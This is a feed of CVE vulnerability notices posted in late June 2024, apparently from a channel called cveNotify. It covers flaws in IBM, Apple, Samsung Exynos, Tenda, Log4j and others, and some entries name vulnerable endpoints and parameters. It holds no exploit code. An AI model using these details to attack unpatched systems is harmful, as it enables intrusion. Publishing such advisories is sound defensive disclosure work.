🚨 CVE-2024-38528nptd-rs is a tool for synchronizing your computer's clock, implementing the NTP and NTS protocols. There is a missing limit for accepted NTS-KE connections. This allows an unauthenticated remote attacker to crash ntpd-rs when an NTS-KE server is configured. Non NTS-KE server configurations, such as the default ntpd-rs configuration, are unaffected. This vulnerability has been patched in version 1.1.3.🎖@cveNotify |
|
| 2024-06-28 18:38:15 |
🚨 CVE-2024-38374The CycloneDX core module provides a model representation of the SBOM along with utilities to assist in creating, validating, and parsing SBOMs. Before deserializing CycloneDX Bill of Materials in XML format, _cyclonedx-core-java_ leverages XPath expressions to determine the schema version of the BOM. The `DocumentBuilderFactory` used to evaluate XPath expressions was not configured securely, making the library vulnerable to XML External Entity (XXE) injection. This vulnerability has been fixed in cyclonedx-core-java version 9.0.4.🎖@cveNotify |
|
| 2024-06-28 18:38:14 |
🚨 CVE-2024-38371authentik is an open-source Identity Provider. Access restrictions assigned to an application were not checked when using the OAuth2 Device code flow. This could potentially allow users without the correct authorization to get OAuth tokens for an application and access it. This issue has been patched in version(s) 2024.6.0, 2024.2.4 and 2024.4.3.🎖@cveNotify |
|
| 2024-06-28 18:38:10 |
🚨 CVE-2024-35155IBM MQ Console 9.3 LTS and 9.3 CD could disclose could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 292765.🎖@cveNotify |
|
| 2024-06-28 18:38:09 |
🚨 CVE-2024-31919IBM MQ 9.0 LTS, 9.1 LTS, 9.2 LTS, 9.3 LTS and 9.3 CD, in certain configurations, is vulnerable to a denial of service attack caused by an error processing messages when an API Exit using MQBUFMH is used. IBM X-Force ID: 290259.🎖@cveNotify |
|
| 2024-06-28 18:38:08 |
🚨 CVE-2024-31912IBM MQ 9.3 LTS and 9.3 CD could allow an authenticated user to escalate their privileges under certain configurations due to incorrect privilege assignment. IBM X-Force ID: 289894.🎖@cveNotify |
|
| 2024-06-28 18:38:07 |
🚨 CVE-2023-36665"protobuf.js (aka protobufjs) 6.10.0 through 7.x before 7.2.5 allows Prototype Pollution, a different vulnerability than CVE-2022-25878. A user-controlled protobuf message can be used by an attacker to pollute the prototype of Object.prototype by adding and overwriting its data and functions. Exploitation can involve: (1) using the function parse to parse protobuf messages on the fly, (2) loading .proto files by using load/loadSync functions, or (3) providing untrusted input to the functions ReflectionObject.setParsedOption and util.setProperty.🎖@cveNotify |
|
| 2024-06-28 18:08:04 |
🚨 CVE-2013-3993IBM InfoSphere BigInsights before 2.1.0.3 allows remote authenticated users to bypass intended file and directory restrictions, or access untrusted data or code, via crafted parameters in unspecified API calls.🎖@cveNotify |
|
| 2024-06-28 17:38:13 |
🚨 CVE-2024-6403A vulnerability, which was classified as critical, has been found in Tenda A301 15.13.08.12. Affected by this issue is the function formWifiBasicSet of the file /goform/SetOnlineDevName. The manipulation of the argument devName leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269948. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-28 17:38:12 |
🚨 CVE-2024-6402A vulnerability classified as critical was found in Tenda A301 15.13.08.12. Affected by this vulnerability is the function fromSetWirelessRepeat of the file /goform/SetOnlineDevName. The manipulation of the argument devName leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-269947. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-28 17:38:11 |
🚨 CVE-2024-38522Hush Line is a free and open-source, anonymous-tip-line-as-a-service for organizations or individuals. The CSP policy applied on the `tips.hushline.app` website and bundled by default in this repository is trivial to bypass. This vulnerability has been patched in version 0.1.0.🎖@cveNotify |
|
| 2024-06-28 17:38:08 |
🚨 CVE-2023-49115MachineSense devices use unauthenticated MQTT messaging to monitor devices and remote viewing of sensor data by users.🎖@cveNotify |
|
| 2024-06-28 17:38:07 |
🚨 CVE-2015-2425Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2015-2383 and CVE-2015-2384.🎖@cveNotify |
|
| 2024-06-28 17:38:06 |
🚨 CVE-2015-1671The Windows DirectWrite library, as used in Microsoft .NET Framework 3.0 SP2, 3.5, 3.5.1, 4, 4.5, 4.5.1, and 4.5.2; Office 2007 SP3 and 2010 SP2; Live Meeting 2007 Console; Lync 2010; Lync 2010 Attendee; Lync 2013 SP1; Lync Basic 2013 SP1; Silverlight 5 before 5.1.40416.00; and Silverlight 5 Developer Runtime before 5.1.40416.00, allows remote attackers to execute arbitrary code via a crafted TrueType font, aka "TrueType Font Parsing Vulnerability."🎖@cveNotify |
|
| 2024-06-28 17:38:05 |
🚨 CVE-2014-4077Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, and Office 2007 SP3, when IMJPDCT.EXE (aka IME for Japanese) is installed, allow remote attackers to bypass a sandbox protection mechanism via a crafted PDF document, aka "Microsoft IME (Japanese) Elevation of Privilege Vulnerability," as exploited in the wild in 2014.🎖@cveNotify |
|
| 2024-06-28 17:38:02 |
🚨 CVE-2014-4148win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted TrueType font, as exploited in the wild in October 2014, aka "TrueType Font Parsing Remote Code Execution Vulnerability."🎖@cveNotify |
|
| 2024-06-28 17:38:01 |
🚨 CVE-2014-2817Microsoft Internet Explorer 6 through 11 allows remote attackers to gain privileges via a crafted web site, aka "Internet Explorer Elevation of Privilege Vulnerability."🎖@cveNotify |
|
| 2024-06-28 17:38:00 |
🚨 CVE-2013-3896Microsoft Silverlight 5 before 5.1.20913.0 does not properly validate pointers during access to Silverlight elements, which allows remote attackers to obtain sensitive information via a crafted Silverlight application, aka "Silverlight Vulnerability."🎖@cveNotify |
|
| 2024-06-28 17:37:56 |
🚨 CVE-2012-1710Unspecified vulnerability in the Oracle WebCenter Forms Recognition component in Oracle Fusion Middleware 10.1.3.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Designer, a different vulnerability than CVE-2012-1709.🎖@cveNotify |
|
| 2024-06-28 17:37:55 |
🚨 CVE-2010-0738The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.🎖@cveNotify |
|
| 2024-06-28 17:37:54 |
🚨 CVE-2010-0840Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, and 1.4.2_25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the March 2010 CPU. Oracle has not commented on claims from a reliable researcher that this is related to improper checks when executing privileged methods in the Java Runtime Environment (JRE), which allows attackers to execute arbitrary code via (1) an untrusted object that extends the trusted class but has not modified a certain method, or (2) "a similar trust issue with interfaces," aka "Trusted Methods Chaining Remote Code Execution Vulnerability."🎖@cveNotify |
|
| 2024-06-28 16:37:32 |
🚨 CVE-2024-38521Hush Line is a free and open-source, anonymous-tip-line-as-a-service for organizations or individuals. There is a stored XSS in the Inbox. The input is displayed using the `safe` Jinja2 attribute, and thus not sanitized upon display. This issue has been patched in version 0.1.0.🎖@cveNotify |
|
| 2024-06-28 16:37:31 |
🚨 CVE-2024-35137IBM Security Access Manager Docker 10.0.0.0 through 10.0.7.1 could allow a local user to possibly elevate their privileges due to sensitive configuration information being exposed. IBM X-Force ID: 292413.🎖@cveNotify |
|
| 2024-06-28 16:37:30 |
🚨 CVE-2024-2859By default, SANnav OVA is shipped with root user login enabled. While protected by a password, access to root could expose SANnav to a remote attacker should they gain access to the root account.🎖@cveNotify |
|
| 2024-06-28 16:37:27 |
🚨 CVE-2023-5973Brocade Web Interface in Brocade Fabric OS v9.x and before v9.2.0 does not properly represent the portName to the user if the portName contains reserved characters. This could allow an authenticated user to alter the UI of the Brocade Switch and change ports display.🎖@cveNotify |
|
| 2024-06-28 16:37:26 |
🚨 CVE-2023-6240A Marvin vulnerability side-channel leakage was found in the RSA decryption operation in the Linux Kernel. This issue may allow a network attacker to decrypt ciphertexts or forge signatures, limiting the services that use that private key.🎖@cveNotify |
|
| 2024-06-28 16:37:25 |
🚨 CVE-2022-1227A privilege escalation flaw was found in Podman. This flaw allows an attacker to publish a malicious image to a public registry. Once this image is downloaded by a potential victim, the vulnerability is triggered after a user runs the 'podman top' command. This action gives the attacker access to the host filesystem, leading to information disclosure or denial of service.🎖@cveNotify |
|
| 2024-06-28 15:38:11 |
🚨 CVE-2023-27636Progress Sitefinity before 15.0.0 allows XSS by authenticated users via the content form in the SF Editor.🎖@cveNotify |
|
| 2024-06-27 23:37:25 |
🚨 CVE-2024-6071PTC Creo Elements/Direct License Server exposes a web interface which can be used by unauthenticated remote attackers to execute arbitrary OS commands on the server.🎖@cveNotify |
|
| 2024-06-27 23:37:24 |
🚨 CVE-2016-20022In the Linux kernel before 4.8, usb_parse_endpoint in drivers/usb/core/config.c does not validate the wMaxPacketSize field of an endpoint descriptor. NOTE: This vulnerability only affects products that are no longer supported by the supplier.🎖@cveNotify |
|
| 2024-06-27 22:37:32 |
🚨 CVE-2024-4395The XPC service within the audit functionality of Jamf Compliance Editor before version 1.3.1 on macOS can lead to local privilege escalation.🎖@cveNotify |
|
| 2024-06-27 22:37:25 |
🚨 CVE-2024-5642CPython 3.9 and earlier doesn't disallow configuring an empty list ("[]") for SSLContext.set_npn_protocols() which is an invalid value for the underlying OpenSSL API. This results in a buffer over-read when NPN is used (see CVE-2024-5535 for OpenSSL). This vulnerability is of low severity due to NPN being not widely used and specifying an empty list likely being uncommon in-practice (typically a protocol name would be configured).🎖@cveNotify |
|
| 2024-06-27 22:37:24 |
🚨 CVE-2022-4968netplan leaks the private key of wireguard to local users. Versions after 1.0 are not affected.🎖@cveNotify |
|
| 2024-06-27 21:37:32 |
🚨 CVE-2024-36073Netwrix CoSoSys Endpoint Protector through 5.9.3 and CoSoSys Unify through 7.0.6 contain a remote code execution vulnerability in the shadowing component of the Endpoint Protector and Unify agent which allows an attacker with administrative access to the Endpoint Protector or Unify server to overwrite sensitive configuration and subsequently execute system commands with SYSTEM/root privileges on a chosen client endpoint.🎖@cveNotify |
|
| 2024-06-27 21:37:25 |
🚨 CVE-2024-22272VMware Cloud Director contains an Improper Privilege Management vulnerability. An authenticated tenant administrator for a given organization within VMware Cloud Director may be able to accidentally disable their organization leading to a Denial of Service for active sessions within their own organization's scope.🎖@cveNotify |
|
| 2024-06-27 21:37:24 |
🚨 CVE-2024-22260VMware Workspace One UEM update addresses an information exposure vulnerability. A malicious actor with network access to the Workspace One UEM may be able to perform an attack resulting in an information exposure.🎖@cveNotify |
|
| 2024-06-27 19:37:46 |
🚨 CVE-2023-28252Windows Common Log File System Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-27 19:37:45 |
🚨 CVE-2023-28206An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1, iOS 15.7.5 and iPadOS 15.7.5, macOS Big Sur 11.7.6. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2024-06-27 19:37:44 |
🚨 CVE-2023-28205A use after free issue was addressed with improved memory management. This issue is fixed in Safari 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2024-06-27 19:37:39 |
🚨 CVE-2023-1389TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.🎖@cveNotify |
|
| 2024-06-27 19:37:38 |
🚨 CVE-2021-3560It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.🎖@cveNotify |
|
| 2024-06-27 19:37:37 |
🚨 CVE-2021-45046It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.🎖@cveNotify |
|
| 2024-06-27 19:37:33 |
🚨 CVE-2020-35730An XSS issue was discovered in Roundcube Webmail before 1.2.13, 1.3.x before 1.3.16, and 1.4.x before 1.4.10. The attacker can send a plain text e-mail message, with JavaScript in a link reference element that is mishandled by linkref_addindex in rcube_string_replacer.php.🎖@cveNotify |
|
| 2024-06-27 19:37:32 |
🚨 CVE-2017-6742The Simple Network Management Protocol (SNMP) subsystem of Cisco IOS 12.0 through 12.4 and 15.0 through 15.6 and IOS XE 2.2 through 3.17 contains multiple vulnerabilities that could allow an authenticated, remote attacker to remotely execute code on an affected system or cause an affected system to reload. An attacker could exploit these vulnerabilities by sending a crafted SNMP packet to an affected system via IPv4 or IPv6. Only traffic directed to an affected system can be used to exploit these vulnerabilities. The vulnerabilities are due to a buffer overflow condition in the SNMP subsystem of the affected software. The vulnerabilities affect all versions of SNMP: Versions 1, 2c, and 3. To exploit these vulnerabilities via SNMP Version 2c or earlier, the attacker must know the SNMP read-only community string for the affected system. To exploit these vulnerabilities via SNMP Version 3, the attacker must have user credentials for the affected system. All devices that have enabled SNMP and have not explicitly excluded the affected MIBs or OIDs should be considered vulnerable. Cisco Bug IDs: CSCve54313.🎖@cveNotify |
|
| 2024-06-27 19:37:31 |
🚨 CVE-2016-8735Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.🎖@cveNotify |
|
| 2024-06-27 19:37:27 |
🚨 CVE-2016-0165The kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability," a different vulnerability than CVE-2016-0143 and CVE-2016-0167.🎖@cveNotify |
|
| 2024-06-27 19:37:25 |
🚨 CVE-2004-1464Cisco IOS 12.2(15) and earlier allows remote attackers to cause a denial of service (refused VTY (virtual terminal) connections), via a crafted TCP connection to the Telnet or reverse Telnet port.🎖@cveNotify |
|
| 2024-06-27 19:07:39 |
🚨 CVE-2023-38180.NET and Visual Studio Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-06-27 19:07:35 |
🚨 CVE-2023-37450The issue was addressed with improved checks. This issue is fixed in iOS 16.6 and iPadOS 16.6, Safari 16.5.2, tvOS 16.6, macOS Ventura 13.5, watchOS 9.6. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2024-06-27 19:07:34 |
🚨 CVE-2023-3519Unauthenticated remote code execution🎖@cveNotify |
|
| 2024-06-27 19:07:33 |
🚨 CVE-2023-36884Windows Search Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-06-27 19:07:32 |
🚨 CVE-2023-36874Windows Error Reporting Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-27 19:07:28 |
🚨 CVE-2023-32435A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.3, Safari 16.4, iOS 16.4 and iPadOS 16.4, iOS 15.7.7 and iPadOS 15.7.7. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.🎖@cveNotify |
|
| 2024-06-27 19:07:27 |
🚨 CVE-2023-32434An integer overflow was addressed with improved input validation. This issue is fixed in watchOS 9.5.2, macOS Big Sur 11.7.8, iOS 15.7.7 and iPadOS 15.7.7, macOS Monterey 12.6.7, watchOS 8.8.1, iOS 16.5.1 and iPadOS 16.5.1, macOS Ventura 13.4.1. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.🎖@cveNotify |
|
| 2024-06-27 19:07:26 |
🚨 CVE-2023-28204An out-of-bounds read was addressed with improved input validation. This issue is fixed in watchOS 9.5, tvOS 16.5, macOS Ventura 13.4, iOS 15.7.6 and iPadOS 15.7.6, Safari 16.5, iOS 16.5 and iPadOS 16.5. Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2024-06-27 19:07:25 |
🚨 CVE-2023-33246For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .🎖@cveNotify |
|
| 2024-06-27 18:37:44 |
🚨 CVE-2024-6373A vulnerability has been found in itsourcecode Online Food Ordering System up to 1.0 and classified as critical. This vulnerability affects unknown code of the file /addproduct.php. The manipulation of the argument photo leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-269806 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-27 18:37:43 |
🚨 CVE-2024-6368A vulnerability was found in LabVantage LIMS 2017. It has been rated as problematic. This issue affects some unknown processing of the file /labvantage/rc?command=page of the component POST Request Handler. The manipulation of the argument param1 leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269801 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-27 18:37:42 |
🚨 CVE-2024-27832The issue was addressed with improved checks. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to elevate privileges.🎖@cveNotify |
|
| 2024-06-27 18:37:38 |
🚨 CVE-2024-27830This issue was addressed through improved state management. This issue is fixed in tvOS 17.5, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. A maliciously crafted webpage may be able to fingerprint the user.🎖@cveNotify |
|
| 2024-06-27 18:37:37 |
🚨 CVE-2024-27820The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.5, iOS 16.7.8 and iPadOS 16.7.8, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-06-27 18:37:36 |
🚨 CVE-2024-27819The issue was addressed by restricting options offered on a locked device. This issue is fixed in iOS 17.5 and iPadOS 17.5. An attacker with physical access may be able to access contacts from the lock screen.🎖@cveNotify |
|
| 2024-06-27 18:07:24 |
🚨 CVE-2020-13965An issue was discovered in Roundcube Webmail before 1.3.12 and 1.4.x before 1.4.5. There is XSS via a malicious XML attachment because text/xml is among the allowed types for a preview.🎖@cveNotify |
|
| 2024-06-27 17:37:43 |
🚨 CVE-2023-30430IBM Security Verify Access 10.0.0 through 10.0.7.1 could allow a local user to obtain sensitive information from trace logs. IBM X-Force ID: 252183.🎖@cveNotify |
|
| 2024-06-27 17:37:42 |
🚨 CVE-2024-39158idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/userSys_deal.php?mudi=infoSet.🎖@cveNotify |
|
| 2024-06-27 17:37:41 |
🚨 CVE-2024-39157idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/ipRecord_deal.php?mudi=del&dataType=&dataID=1.🎖@cveNotify |
|
| 2024-06-27 17:37:37 |
🚨 CVE-2024-39154idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/keyWord_deal.php?mudi=del&dataType=word&dataTypeCN.🎖@cveNotify |
|
| 2024-06-27 17:37:36 |
🚨 CVE-2024-1153Improper Access Control vulnerability in Talya Informatics Travel APPS allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Travel APPS: before v17.0.68.🎖@cveNotify |
|
| 2024-06-27 17:37:32 |
🚨 CVE-2024-6372A vulnerability, which was classified as critical, was found in itsourcecode Tailoring Management System 1.0. This affects an unknown part of the file customeradd.php. The manipulation of the argument fullname/address/phonenumber/sex/email/city/comment leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269805 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-27 17:37:31 |
🚨 CVE-2024-1107Authorization Bypass Through User-Controlled Key vulnerability in Talya Informatics Travel APPS allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Travel APPS: before v17.0.68.🎖@cveNotify |
|
| 2024-06-27 17:37:30 |
🚨 CVE-2024-5535Issue summary: Calling the OpenSSL API function SSL_select_next_proto with anempty supported client protocols buffer may cause a crash or memory contents tobe sent to the peer.Impact summary: A buffer overread can have a range of potential consequencessuch as unexpected application beahviour or a crash. In particular this issuecould result in up to 255 bytes of arbitrary private data from memory being sentto the peer leading to a loss of confidentiality. However, only applicationsthat directly call the SSL_select_next_proto function with a 0 length list ofsupported client protocols are affected by this issue. This would normally neverbe a valid scenario and is typically not under attacker control but may occur byaccident in the case of a configuration or programming error in the callingapplication.The OpenSSL API function SSL_select_next_proto is typically used by TLSapplications that support ALPN (Application Layer Protocol Negotiation) or NPN(Next Protocol Negotiation). NPN is older, was never standardised andis deprecated in favour of ALPN. We believe that ALPN is significantly morewidely deployed than NPN. The SSL_select_next_proto function accepts a list ofprotocols from the server and a list of protocols from the client and returnsthe first protocol that appears in the server list that also appears in theclient list. In the case of no overlap between the two lists it returns thefirst item in the client list. In either case it will signal whether an overlapbetween the two lists was found. In the case where SSL_select_next_proto iscalled with a zero length client list it fails to notice this condition andreturns the memory immediately following the client list pointer (and reportsthat there was no overlap in the lists).This function is typically called from a server side application callback forALPN or a client side application callback for NPN. In the case of ALPN the listof protocols supplied by the client is guaranteed by libssl to never be zero inlength. The list of server protocols comes from the application and should nevernormally be expected to be of zero length. In this case if theSSL_select_next_proto function has been called as expected (with the listsupplied by the client passed in the client/client_len parameters), then theapplication will not be vulnerable to this issue. If the application hasaccidentally been configured with a zero length server list, and hasaccidentally passed that zero length server list in the client/client_lenparameters, and has additionally failed to correctly handle a "no overlap"response (which would normally result in a handshake failure in ALPN) then itwill be vulnerable to this problem.In the case of NPN, the protocol permits the client to opportunistically selecta protocol when there is no overlap. OpenSSL returns the first client protocolin the no overlap case in support of this. The list of client protocols comesfrom the application and should never normally be expected to be of zero length.However if the SSL_select_next_proto function is accidentally called with aclient_len of 0 then an invalid memory pointer will be returned instead. If theapplication uses this output as the opportunistic protocol then the loss ofconfidentiality will occur.This issue has been assessed as Low severity because applications are mostlikely to be vulnerable if they are using NPN instead of ALPN - but NPN is notwidely used. It also requires an application configuration or programming error.Finally, this issue would not typically be under attacker control making activeexploitation unlikely.The FIPS modules in 3.3, 3.2, 3.1 and 3.0 are not affected by this issue.Due to the low severity of this issue we are not issuing new releases ofOpenSSL at this time. The fix will be included in the next releases when theybecome available.🎖@cveNotify |
|
| 2024-06-27 17:37:26 |
🚨 CVE-2024-27831An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, macOS Sonoma 14.5. Processing a file may lead to unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2024-06-27 17:37:25 |
🚨 CVE-2024-3727A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.🎖@cveNotify |
|
| 2024-06-27 17:07:31 |
🚨 CVE-2024-27833An integer overflow was addressed with improved input validation. This issue is fixed in tvOS 17.5, iOS 16.7.8 and iPadOS 16.7.8, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5. Processing maliciously crafted web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-06-27 17:07:30 |
🚨 CVE-2024-28818An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, Exynos 990, Exynos 1080, Exynos 2100, Exynos 2200, Exynos 1280, Exynos 1380, Exynos 1330, Exynos 2400, Exynos Modem 5123, Exynos Modem 5300. The baseband software does not properly check states specified by the RRC (Radio Resource Control) module. This can lead to disclosure of sensitive information.🎖@cveNotify |
|
| 2024-06-27 17:07:26 |
🚨 CVE-2024-27372An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_nan_config_get_nl_params(), there is no input validation check on disc_attr->infrastructure_ssid_len coming from userspace, which can lead to a heap overwrite.🎖@cveNotify |
|
| 2024-06-27 17:07:25 |
🚨 CVE-2024-27370An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_nan_config_get_nl_params(), there is no input validation check on hal_req->num_config_discovery_attr coming from userspace, which can lead to a heap overwrite.🎖@cveNotify |
|
| 2024-06-27 17:07:24 |
🚨 CVE-2023-50804An issue was discovered in Samsung Mobile Processor, and Modem Exynos 9820, Exynos 9825, Exynos 980, Exynos 990, Exynos 850, Exynos 1080, Exynos 2100, Exynos 2200, Exynos 1280, Exynos 1380, Exynos 1330, Exynos Modem 5123, Exynos Modem 5300. The baseband software does not properly check format types specified by the NAS (Non-Access-Stratum) module. This can lead to bypass of authentication.🎖@cveNotify |
|
| 2024-06-27 16:37:38 |
🚨 CVE-2024-6388Marco Trevisan discovered that the Ubuntu Advantage Desktop Daemon, before version 1.12, leaks the Pro token to unprivileged users by passing the token as an argument in plaintext.🎖@cveNotify |
|
| 2024-06-27 16:37:37 |
🚨 CVE-2024-39376TELSAT marKoni FM Transmitters are vulnerable to users gaining unauthorized access to sensitive information or performing actions beyond their designated permissions.🎖@cveNotify |
|
| 2024-06-27 16:37:36 |
🚨 CVE-2024-39375TELSAT marKoni FM Transmitters are vulnerable to an attacker bypassing authentication and gaining administrator privileges.🎖@cveNotify |
|
| 2024-06-27 16:37:32 |
🚨 CVE-2024-39373TELSAT marKoni FM Transmitters are vulnerable to a command injection vulnerability through the manipulation of settings and could allow an attacker to gain unauthorized access to the system with administrative privileges.🎖@cveNotify |
|
| 2024-06-27 16:37:31 |
🚨 CVE-2024-31883IBM Security Verify Access 10.0.0.0 through 10.0.7.1, under certain configurations, could allow an unauthenticated attacker to cause a denial of service due to asymmetric resource consumption. IBM X-Force ID: 287615.🎖@cveNotify |
|
| 2024-06-27 16:37:30 |
🚨 CVE-2023-30430IBM Security Verify Access 10.0.0 through 10.0.7.1 could allow a local user to obtain sensitive information from trace logs. IBM X-Force ID: 252183.🎖@cveNotify |
|
| 2024-06-27 16:37:26 |
🚨 CVE-2024-27379An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_nan_subscribe_get_nl_params(), there is no input validation check on hal_req->num_intf_addr_present coming from userspace, which can lead to a heap overwrite.🎖@cveNotify |
|
| 2024-06-27 16:37:25 |
🚨 CVE-2024-27375An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_nan_followup_get_nl_params(), there is no input validation check on hal_req->sdea_service_specific_info_len coming from userspace, which can lead to a heap overwrite.🎖@cveNotify |
|
| 2024-06-27 16:07:26 |
🚨 CVE-2024-27381An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_send_action_frame_ut(), there is no input validation check on len coming from userspace, which can lead to a heap over-read.🎖@cveNotify |
|
| 2024-06-27 16:07:25 |
🚨 CVE-2024-27378An issue was discovered in Samsung Mobile Processor Exynos 980, Exynos 850, Exynos 1280, Exynos 1380, and Exynos 1330. In the function slsi_send_action_frame_cert(), there is no input validation check on len coming from userspace, which can lead to a heap over-read.🎖@cveNotify |
|
| 2024-06-27 16:07:24 |
